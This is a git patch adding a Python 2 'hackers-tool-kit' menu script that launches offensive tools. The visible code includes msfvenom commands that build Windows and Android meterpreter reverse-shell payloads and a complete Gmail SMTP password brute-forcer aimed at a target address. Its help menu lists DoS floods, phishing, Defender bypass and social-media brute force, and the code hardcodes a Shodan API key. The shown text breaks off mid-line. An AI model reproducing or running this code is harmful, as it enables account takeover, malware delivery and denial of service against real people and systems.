- crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 493870cc6a6664700750ce4907f4b9725123d00e Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sat, 11 May 2019 03:39:42 +0100 Subject: [PATCH 110/214] Add files via upload --- htk.py | 2712 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2712 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..b77e6e6 --- /dev/null +++ b/htk.py @@ -0,0 +1,2712 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +#-------------------# +#COLOR VARIABLES END# + +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def mainbanner2(): + print """\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner(): + import random + for x in range(10): + num = random.randint(1,7) + if num == 1: + mainbanner1() + if num == 2: + mainbanner2() + if num == 3: + mainbanner3() + if num == 4: + mainbanner4() + if num == 5: + mainbanner5() + if num == 6: + mainbanner6() + if num == 7: + mainbanner7() +#--------------------------# +#MAIN STARTING BANNER END# + + +#HELP BANNER START# +#-----------------# +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +about : about the creator / me +? : displays this message +clear : clears screen except for banner +clearall: clears everything on screen +banner : clears screen and shows new banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +connect : connect to a host +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +aircrack: aircrack-ng automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal Hackers-Tool-Kit +arpspoof: arp spoofing | +sslscan : ssl scan a host ██╗ ██╗ ████████╗ ██╗ ██╗ +payload : make a metasploit payload of your choice ██║ ██║ ╚══██╔══╝ ██║ ██╔╝ +crunch : Make wordlists ███████║\033[91m█████\033[0m╗██║\033[91m█████\033[0m╗█████╔╝ +traff : shows your internet traffic ██╔══██║╚════╝██║╚════╝██╔═██╗ +resa : reset account password ██║ ██║ ██║ ██║ ██╗ +resu : reset unix password ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ +hashid : find the type of hash of a hash | +wafwoof : check a web application for firewall Hackers-Tool-Kit +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +upgrade : fully update your linux os +nscript : use a nmap script +sshver : scan for ssh version on a host +chains : browse web anonymous via proxychains [proxychains setup required] +mysqlv : scan for mysql version on a host +terminal: open another new terminal +source : get source code from a website +dirscan : web directory scanner / bruteforce +aserver : start a apache server +run : run a file +\033[91m---------------------------------------------------------------------------------\033[0m + """ +#-----------------# +#HELP BANNER END# + + +#WINDOWS REVERSE TCP PAYLOAD START# +#---------------------------------# +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#WINDOWS REVERSE TCP PAYLOAD END# + + +#ANDROID REVERSE TCP PAYLOAD START# +#---------------------------------# +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +#-------------------------------# +#ANDROID REVERSE TCP PAYLOAD END# + +#GMAIL BRUTEFORCE START# +#----------------------# +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +#--------------------# +#GMAIL BRUTEFORCE END# + +#PORT SCAN START# +#---------------# +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +#-------------# +#PORT SCAN END# + +#INSTAGRAM BRUTEFORCE START# +#--------------------------# +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +#------------------------# +#INSTAGRAM BRUTEFORCE END# + +#FACEBOOK BRUTEFORCE START# +#-------------------------# +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +#-----------------------# +#FACEBOOK BRUTEFORCE END# + +#HOST TO IP START# +#----------------# +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +#--------------# +#HOST TO IP END# + +#YOUR OWN IP START# +#-----------------# +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) + print "\n Router IP" + print "----------------------------\033[92m" + os.system('curl "http://myexternalip.com/raw"') + print "\n\033[0m----------------------------" +#---------------# +#YOUR OWN IP END# + + +#AUTOMATED WIFI HACK START# +#-------------------------# +def wifite(): + os.system("wifite") +#-----------------------# +#AUTOMATED WIFI HACK END# + + +#MONITOR MODE START# +#------------------# +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +#----------------# +#MONITOR MODE END# + + +#DEVICES IN THE NET START# +#------------------------# +def netdev(): + os.system("netdiscover") +#----------------------# +#DEVICES IN THE NET END# + + +#NETS AROUND YOU START# +#-----------------------# +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +#---------------------# +#NETS AROUND YOU END# + + +#INFO SCAN HOST START# +#--------------------# +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print 